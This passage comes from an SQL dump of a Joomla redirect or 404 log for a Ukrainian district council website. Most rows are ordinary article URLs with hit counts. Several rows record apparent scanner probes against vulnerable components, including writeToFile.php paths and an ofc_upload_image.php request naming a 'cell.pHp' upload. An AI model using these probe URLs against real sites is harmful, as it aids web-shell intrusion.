00:00:00',301),(7496,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-08 23:51:23','0000-00-00 00:00:00',301),(7497,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=uk','','','',5,0,'2014-10-08 23:55:18','0000-00-00 00:00:00',301),(7498,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=uk','','','',4,0,'2014-10-08 23:58:40','0000-00-00 00:00:00',301),(7499,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57&Itemid=98&lang=uk','','','',3,0,'2014-10-09 00:00:02','0000-00-00 00:00:00',301),(7500,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=49:--12042013-&Itemid=88&lang=en','','','',2,0,'2014-10-09 00:00:46','0000-00-00 00:00:00',301),(7501,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-09 00:01:06','0000-00-00 00:00:00',301),(7502,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56:--03022014-&Itemid=97&lang=uk','','','',7,0,'2014-10-09 00:01:24','0000-00-00 00:00:00',301),(7503,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-09 00:05:44','0000-00-00 00:00:00',301),(7504,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57:--15042014-&Itemid=98&lang=uk','','','',3,0,'2014-10-09 00:08:53','0000-00-00 00:00:00',301),(7505,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-10-09 00:12:16','0000-00-00 00:00:00',301),(7506,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-10-09 00:13:44','0000-00-00 00:00:00',301),(7507,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-09 00:16:05','0000-00-00 00:00:00',301),(7508,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-09 00:19:09','0000-00-00 00:00:00',301),(7509,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56&Itemid=97&lang=uk','','','',3,0,'2014-10-09 00:23:27','0000-00-00 00:00:00',301),(7510,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=ru&Itemid=0','','','',3,0,'2014-10-09 00:26:14','0000-00-00 00:00:00',301),(7511,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57:--15042014-&Itemid=98&lang=uk','','','',2,0,'2014-10-09 00:28:44','0000-00-00 00:00:00',301),(7512,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47:-21022013-&Itemid=86&lang=en','','','',4,0,'2014-10-09 00:33:35','0000-00-00 00:00:00',301),(7513,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',6,0,'2014-10-09 00:34:07','0000-00-00 00:00:00',301),(7514,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-09 00:38:45','0000-00-00 00:00:00',301),(7515,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-09 00:40:07','0000-00-00 00:00:00',301),(7516,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-09 00:40:23','0000-00-00 00:00:00',301),(7517,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56&Itemid=97&lang=ru','','','',2,0,'2014-10-09 00:52:00','0000-00-00 00:00:00',301),(7518,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-09 01:09:13','0000-00-00 00:00:00',301),(7519,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-10-09 01:23:55','0000-00-00 00:00:00',301),(7520,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10&Itemid=17&lang=en','','','',6,0,'2014-10-09 01:25:58','0000-00-00 00:00:00',301),(7521,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56&Itemid=97&lang=en','','','',2,0,'2014-10-09 01:26:18','0000-00-00 00:00:00',301),(7522,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-09 01:27:39','0000-00-00 00:00:00',301),(7523,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1372:2014-08-04-19-26-16&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-09 02:18:55','0000-00-00 00:00:00',301),(7524,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1069:23--------&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-09 02:18:59','0000-00-00 00:00:00',301),(7525,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=57&Itemid=98&lang=en','','','',2,0,'2014-10-09 02:56:44','0000-00-00 00:00:00',301),(7526,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-10-09 02:58:23','0000-00-00 00:00:00',301),(7527,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=uk','','','',5,0,'2014-10-09 02:58:58','0000-00-00 00:00:00',301),(7528,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51:--19072013-&Itemid=92&lang=uk','','','',4,0,'2014-10-09 03:10:13','0000-00-00 00:00:00',301),(7529,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-09 03:13:40','0000-00-00 00:00:00',301),(7530,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56&Itemid=97&lang=en','','','',3,0,'2014-10-09 03:13:58','0000-00-00 00:00:00',301),(7531,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:------------2014--&catid=36&Itemid=70&lang=en','','','',11,0,'2014-10-09 03:15:01','0000-00-00 00:00:00',301),(7532,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=uk','','','',2,0,'2014-10-09 03:42:01','0000-00-00 00:00:00',301),(7533,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1263:2014-03-31-14-00-08&catid=10&Itemid=17&lang=en','','','',3,0,'2014-10-09 03:42:44','0000-00-00 00:00:00',301),(7534,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56:--03022014-&Itemid=97&lang=en','','','',2,0,'2014-10-09 03:44:27','0000-00-00 00:00:00',301),(7535,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-09 03:47:20','0000-00-00 00:00:00',301),(7536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=36&Itemid=70&lang=en','','','',6,0,'2014-10-09 03:51:48','0000-00-00 00:00:00',301),(7537,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=57&Itemid=98&lang=en','','','',3,0,'2014-10-09 03:51:57','0000-00-00 00:00:00',301),(7538,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-09 03:56:33','0000-00-00 00:00:00',301),(7539,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-09 04:03:39','0000-00-00 00:00:00',301),(7540,'http://www.malyn-rayrada.org.ua/joomla2/components/com_community/index.html','','','',1,0,'2014-10-09 04:24:55','0000-00-00 00:00:00',301),(7541,'http://www.malyn-rayrada.org.ua/joomla2/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-09 04:24:59','0000-00-00 00:00:00',301),(7542,'http://www.malyn-rayrada.org.ua/joomla2/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-09 04:25:03','0000-00-00 00:00:00',301),(7543,'http://www.malyn-rayrada.org.ua/joomla2/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-09 04:25:09','0000-00-00 00:00:00',301),(7544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=59&Itemid=107&lang=uk','','','',5,0,'2014-10-09 04:25:58','0000-00-00 00:00:00',301),(7545,'http://malyn-rayrada.org.ua/sukuseura/components/com_community/index.html','','','',1,0,'2014-10-09 05:00:07','0000-00-00 00:00:00',301),(7546,'http://malyn-rayrada.org.ua/sukuseura/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-09 05:00:10','0000-00-00 00:00:00',301),(7547,'http://malyn-rayrada.org.ua/sukuseura/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-09 05:00:14','0000-00-00 00:00:00',301),(7548,'http://malyn-rayrada.org.ua/sukuseura/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-09 05:00:19','0000-00-00 00:00:00',301),(7549,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51&Itemid=92&lang=uk','','','',2,0,'2014-10-09 05:18:19','0000-00-00 00:00:00',301),(7550,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-10-09 05:20:09','0000-00-00 00:00:00',301),(7551,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51&Itemid=92&lang=ru','','','',3,0,'2014-10-09 05:33:27','0000-00-00 00:00:00',301),(7552,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-09 05:34:23','0000-00-00 00:00:00',301),(7553,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=en','','','',5,0,'2014-10-09 05:35:05','0000-00-00 00:00:00',301),(7554,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&catid=57&Itemid=98&lang=uk','','','',1,0,'2014-10-09 05:36:28','0000-00-00 00:00:00',301),(7555,'http://www.malyn-rayrada.org.ua/forum/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',2,0,'2014-10-09 05:54:35','0000-00-00 00:00:00',301),(7556,'http://www.malyn-rayrada.org.ua/forum/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',2,0,'2014-10-09 05:54:38','0000-00-00 00:00:00',301),(7557,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-10-09 05:56:34','0000-00-00 00:00:00',301),(7558,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-09 06:04:26','0000-00-00 00:00:00',301),(7559,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=cell.pHp&141008-230831','','','',1,0,'2014-10-09 06:08:33','0000-00-00 00:00:00',301),(7560,'http://www.malyn-rayrada.org.ua/index.php?option=com_community&view=frontpage&141008-230836','','','',1,0,'2014-10-09 06:08:37','0000-00-00 00:00:00',301),(7561,'http://www.malyn-rayrada.org.ua/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php?141008-230838','','','',1,0,'2014-10-09 06:08:40','0000-00-00 00:00:00',301),(7562,'http://www.malyn-rayrada.org.ua/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php?141008-230843','','','',1,0,'2014-10-09 06:08:44','0000-00-00 00:00:00',301),(7563,'http://www.malyn-rayrada.org.ua/index.php?option=com_jdownloads&Itemid=101&view=upload&141008-230847','','','',1,0,'2014-10-09 06:08:49','0000-00-00 00:00:00',301),(7564,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51:--19072013-&Itemid=92&lang=ru','','','',3,0,'2014-10-09 06:09:12','0000-00-00 00:00:00',301),(7565,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-09 06:11:03','0000-00-00 00:00:00',301),(7566,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47&Itemid=86&lang=en','','','',2,0,'2014-10-09 06:26:24','0000-00-00 00:00:00',301),(7567,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47:--21022013-&Itemid=86&lang=uk','','','',3,0,'2014-10-09 06:30:24','0000-00-00 00:00:00',301),(7568,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-10-09 06:32:55','0000-00-00 00:00:00',301),(7569,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=uk','','','',2,0,'2014-10-09 06:33:09','0000-00-00 00:00:00',301),(7570,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=944:-l-r-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-09 06:34:28','0000-00-00 00:00:00',301),(7571,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1152:2013-11-28-14-58-05&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-09 06:34:30','0000-00-00 00:00:00',301),(7572,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49:--12042013-&Itemid=88&lang=en','','','',5,0,'2014-10-09 07:02:40','0000-00-00 00:00:00',301),(7573,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-09 07:05:49','0000-00-00 00:00:00',301),(7574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=uk','','','',4,0,'2014-10-09 07:12:33','0000-00-00 00:00:00',301),(7575,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-09 07:12:40','0000-00-00 00:00:00',301),(7576,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47:-21022013-&Itemid=86&lang=uk','','','',5,0,'2014-10-09 07:12:44','0000-00-00 00:00:00',301),(7577,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-10-09 07:22:50','0000-00-00 00:00:00',301),(7578,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=ru','','','',2,0,'2014-10-09 07:27:48','0000-00-00 00:00:00',301),(7579,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-10-09 07:30:52','0000-00-00 00:00:00',301),(7580,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-09 07:31:57','0000-00-00 00:00:00',301),(7581,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=uk','','','',1,0,'2014-10-09 07:33:03','0000-00-00 00:00:00',301),(7582,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49&Itemid=88&lang=en','','','',2,0,'2014-10-09 07:34:38','0000-00-00 00:00:00',301),(7583,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1171:2014-01-11-09-58-40&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-09 07:39:51','0000-00-00 00:00:00',301),(7584,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47:--21022013-&Itemid=86&lang=ru','','','',1,0,'2014-10-09 07:41:17','0000-00-00 00:00:00',301),(7585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-09 07:41:20','0000-00-00 00:00:00',301),(7586,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=ru','','','',2,0,'2014-10-09 07:43:41','0000-00-00 00:00:00',301),(7587,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=ru&Itemid=0','','','',6,0,'2014-10-09 07:48:23','0000-00-00 00:00:00',301),(7588,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-09 08:03:42','0000-00-00 00:00:00',301),(7589,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=ru','','','',2,0,'2014-10-09 08:06:41','0000-00-00 00:00:00',301),(7590,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47:-21022013-&Itemid=86&lang=ru','','','',1,0,'2014-10-09 08:11:01','0000-00-00 00:00:00',301),(7591,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1182:2014-01-23-06-45-09&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-09 08:11:50','0000-00-00 00:00:00',301),(7592,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=uk&Itemid=','','','',4,0,'2014-10-09 08:12:54','0000-00-00 00:00:00',301),(7593,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49:--12042013-&Itemid=88&lang=en','','','',4,0,'2014-10-09 08:17:59','0000-00-00 00:00:00',301),(7594,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-09 08:34:46','0000-00-00 00:00:00',301),(7595,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-09 08:39:42','0000-00-00 00:00:00',301),(7596,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=58:--30042014-&Itemid=105&lang=en','','','',2,0,'2014-10-09 08:39:45','0000-00-00 00:00:00',301),(7597,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=ru&Itemid=','','','',4,0,'2014-10-09 08:41:23','0000-00-00 00:00:00',301),(7598,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1100:2013-10-02-18-03-10&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-09 08:53:01','0000-00-00 00:00:00',301),(7599,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1093:-2017-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-09 08:53:02','0000-00-00 00:00:00',301),(7600,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1065:2013-08-14-12-52-50&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-09 08:53:04','0000-00-00 00:00:00',301),(7601,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-09 08:54:52','0000-00-00 00:00:00',301),(7602,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=36&Itemid=70&lang=en','','','',6,0,'2014-10-09 08:58:21','0000-00-00 00:00:00',301),(7603,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:------------2010-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-10-09 09:08:37','0000-00-00 00:00:00',301),(7604,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-09 09:23:42','0000-00-00 00:00:00',301),(7605,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1230:l-r&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-09 09:52:18','0000-00-00 00:00:00',301),(7606,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1172:2014-01-14-14-46-07&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-09 09:52:20','0000-00-00 00:00:00',301),(7607,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=uk','','','',2,0,'2014-10-09 10:43:03','0000-00-00 00:00:00',301),(7608,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=ru','','','',2,0,'2014-10-09 11:13:36','0000-00-00 00:00:00',301),(7609,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1252:2014-03-24-17-19-07&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-09 11:25:18','0000-00-00 00:00:00',301),(7610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=49:--12042013-&Itemid=88&lang=en','','','',5,0,'2014-10-09 11:34:11','0000-00-00 00:00:00',301),(7611,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=ru&Itemid=','','','',6,0,'2014-10-09 11:42:16','0000-00-00 00:00:00',301),(7612,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47&Itemid=86&lang=ru','','','',3,0,'2014-10-09 11:42:59','0000-00-00 00:00:00',301),(7613,'http://www.malyn-rayrada.org.ua/gonul/components/com_community/index.html','','','',1,0,'2014-10-09 11:48:22','0000-00-00 00:00:00',301),(7614,'http://www.malyn-rayrada.org.ua/gonul/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-09 11:48:27','0000-00-00 00:00:00',301),(7615,'http://www.malyn-rayrada.org.ua/gonul/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-09 11:48:31','0000-00-00 00:00:00',301),(7616,'http://www.malyn-rayrada.org.ua/gonul/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-09 11:48:38','0000-00-00 00:00:00',301),(7617,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=uk','','','',2,0,'2014-10-09 11:50:30','0000-00-00 00:00:00',301),(7618,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=ru','','','',2,0,'2014-10-09 11:59:41','0000-00-00 00:00:00',301),(7619,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=962:-2017-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-09 12:02:32','0000-00-00 00:00:00',301),(7620,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-09 12:14:56','0000-00-00 00:00:00',301),(7621,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=58:--30042014-&Itemid=105&lang=ru','','','',4,0,'2014-10-09 12:24:40','0000-00-00 00:00:00',301),(7622,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=58:--30042014-&Itemid=105&lang=uk','','','',6,0,'2014-10-09 12:24:46','0000-00-00 00:00:00',301),(7623,'http://malyn-rayrada.org.ua/cluster/','','','',2,0,'2014-10-09 12:44:45','0000-00-00 00:00:00',301),(7624,'http://malyn-rayrada.org.ua/servers/','','','',2,0,'2014-10-09 12:44:46','0000-00-00 00:00:00',301),(7625,'http://malyn-rayrada.org.ua/service/','','','',2,0,'2014-10-09 12:44:48','0000-00-00 00:00:00',301),(7626,'http://malyn-rayrada.org.ua/faq/technical/paytype/','','','',2,0,'2014-10-09 12:44:46','0000-00-00 00:00:00',301),(7627,'http://malyn-rayrada.org.ua/domain/actualization/','','','',2,0,'2014-10-09 12:44:49','0000-00-00 00:00:00',301),(7628,'http://malyn-rayrada.org.ua/web-hosting/','','','',2,0,'2014-10-09 12:44:52','0000-00-00 00:00:00',301),(7629,'http://malyn-rayrada.org.ua/unix/maximum/','','','',2,0,'2014-10-09 12:44:53','0000-00-00 00:00:00',301),(7630,'http://malyn-rayrada.org.ua/windows/bignet','','','',2,0,'2014-10-09 12:44:55','0000-00-00 00:00:00',301),(7631,'http://malyn-rayrada.org.ua/unix/perfect/','','','',2,0,'2014-10-09 12:44:56','0000-00-00 00:00:00',301),(7632,'http://malyn-rayrada.org.ua/hosting/testdrive/','','','',2,0,'2014-10-09 12:44:57','0000-00-00 00:00:00',301),(7633,'http://malyn-rayrada.org.ua/domain/domaincontact/','','','',2,0,'2014-10-09 12:44:59','0000-00-00 00:00:00',301),(7634,'http://malyn-rayrada.org.ua/servers/dedicated/','','','',2,0,'2014-10-09 12:45:01','0000-00-00 00:00:00',301),(7635,'http://malyn-rayrada.org.ua/vps/','','','',2,0,'2014-10-09 12:45:07','0000-00-00 00:00:00',301),(7636,'http://malyn-rayrada.org.ua/about/clients/','','','',2,0,'2014-10-09 12:45:02','0000-00-00 00:00:00',301),(7637,'http://malyn-rayrada.org.ua/web-hosting/testdrive/','','','',2,0,'2014-10-09 12:45:04','0000-00-00 00:00:00',301),(7638,'http://malyn-rayrada.org.ua/windows/vigodniynet','','','',2,0,'2014-10-09 12:45:05','0000-00-00 00:00:00',301),(7639,'http://malyn-rayrada.org.ua/bay.php?p=bignet&month=12&action=hosting','','','',2,0,'2014-10-09 12:45:09','0000-00-00 00:00:00',301),(7640,'http://malyn-rayrada.org.ua/bay.php?p=maximumnet&month=12&action=hosting','','','',2,0,'2014-10-09 12:45:15','0000-00-00 00:00:00',301),(7641,'http://malyn-rayrada.org.ua/windows/bignet/','','','',2,0,'2014-10-09 12:45:11','0000-00-00 00:00:00',301),(7642,'http://malyn-rayrada.org.ua/web-hosting/moneyback/','','','',2,0,'2014-10-09 12:45:11','0000-00-00 00:00:00',301),(7643,'http://malyn-rayrada.org.ua/windows/maximumnet','','','',2,0,'2014-10-09 12:45:13','0000-00-00 00:00:00',301),(7644,'http://malyn-rayrada.org.ua/resseler/whywe/','','','',2,0,'2014-10-09 12:45:17','0000-00-00 00:00:00',301),(7645,'http://malyn-rayrada.org.ua/faq/technical/','','','',2,0,'2014-10-09 12:45:17','0000-00-00 00:00:00',301),(7646,'http://malyn-rayrada.org.ua/about/button/','','','',2,0,'2014-10-09 12:45:18','0000-00-00 00:00:00',301),(7647,'http://malyn-rayrada.org.ua/windows/vigodniynet/','','','',1,0,'2014-10-09 12:45:21','0000-00-00 00:00:00',301),(7648,'http://malyn-rayrada.org.ua/servers/rack/','','','',1,0,'2014-10-09 12:45:22','0000-00-00 00:00:00',301),(7649,'http://malyn-rayrada.org.ua/about/news/','','','',1,0,'2014-10-09 